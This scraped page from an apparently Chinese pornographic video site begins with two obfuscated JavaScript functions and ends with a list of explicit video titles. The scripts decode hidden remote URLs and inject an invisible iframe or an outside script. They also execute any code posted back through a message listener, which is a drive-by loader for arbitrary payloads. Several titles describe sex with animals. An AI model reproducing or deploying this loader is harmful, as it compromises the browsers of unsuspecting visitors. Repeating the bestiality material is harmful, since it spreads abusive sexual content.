function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

一个非常温暖的人妖精子飞溅5566 人观看

一个非常温暖的人妖精子飞溅

性感的巴西变性人激烈的屁股他妈的与她的男朋友783 人观看

性感的巴西变性人激烈的屁股他妈的与她的男朋友

淫挂钩3023 人观看

淫挂钩

娘娘腔在没有手的情况下自慰她的混蛋和射精 - 人妖反式4669 人观看

娘娘腔在没有手的情况下自慰她的混蛋和射精 - 人妖反式

性感的巴西人妖铁杆屁股他妈的与角质的家伙7403 人观看

性感的巴西人妖铁杆屁股他妈的与角质的家伙

成熟的变性人自拍和与客户发生性关系1565 人观看

成熟的变性人自拍和与客户发生性关系

小小的 亚洲 人妖 与 黑皮肤 吸吮 公鸡 并 从 肛门 后面 拿 它4523 人观看

小小的 亚洲 人妖 与 黑皮肤 吸吮 公鸡 并 从 肛门 后面 拿 它

舔阴部后最好的他妈的。 暨上 Stepsis1367 人观看

舔阴部后最好的他妈的。 暨上 Stepsis

大屁股拉丁越野孩儿炫耀屁股后性交1905 人观看

大屁股拉丁越野孩儿炫耀屁股后性交

人妖 sara 女孩 手淫 她的 迪克3456 人观看

人妖 sara 女孩 手淫 她的 迪克

挂未切割的拉丁裔深入Tgirl2577 人观看

挂未切割的拉丁裔深入Tgirl

放荡的巴西变性人铁杆肛门与她的角质情人碰撞3379 人观看

放荡的巴西变性人铁杆肛门与她的角质情人碰撞

大白逼让狗插红了454 人观看

大白逼让狗插红了

哈士奇添了人妖的奶子与鸡巴1074 人观看

哈士奇添了人妖的奶子与鸡巴

可爱的 性感的 人妖 15090 人观看

可爱的 性感的 人妖 1

大黑狗从后面插了进去1547 人观看

大黑狗从后面插了进去

大奶与狗屌8281 人观看

大奶与狗屌

阿曼达 利马 角质 巴西 人妖 粗糙 屁股 他妈的 与 老 情人8381 人观看

阿曼达 利马 角质 巴西 人妖 粗糙 屁股 他妈的 与 老 情人

异国情调的人妖在凸轮上抽搐9255 人观看

异国情调的人妖在凸轮上抽搐

娘娘腔 催眠 肛门872 人观看

娘娘腔 催眠 肛门

极端的德国地牢异装癖在监狱中肛交8039 人观看

极端的德国地牢异装癖在监狱中肛交

杰西在屁股上被搞砸了8517 人观看

杰西在屁股上被搞砸了

丰满的变性人热三人行与热螺柱和超级性感的丰满宝贝3114 人观看

丰满的变性人热三人行与热螺柱和超级性感的丰满宝贝

丰满 人妖 比安卡 山 喜欢 屁股 他妈的 与 托尼 李3962 人观看

丰满 人妖 比安卡 山 喜欢 屁股 他妈的 与 托尼 李

可爱的呻吟紫色头发 Emo 跨性别女孩吮吸吻和深喉邋遢的公鸡直到她堵嘴7434 人观看

可爱的呻吟紫色头发 Emo 跨性别女孩吮吸吻和深喉邋遢的公鸡直到她堵嘴

扫平和暴露狂夫妇在酒店他妈的,她很漂亮4409 人观看

扫平和暴露狂夫妇在酒店他妈的,她很漂亮

黑丝女郎逼被塞得紧紧的9657 人观看

黑丝女郎逼被塞得紧紧的

尝试第一次拉丁人妖公鸡1975 人观看

尝试第一次拉丁人妖公鸡

Katoey 是个荡妇,他妈的在亚洲的屁股客户7617 人观看

Katoey 是个荡妇,他妈的在亚洲的屁股客户

茉莉和赛勒斯表达爱欲和盗窃7877 人观看

茉莉和赛勒斯表达爱欲和盗窃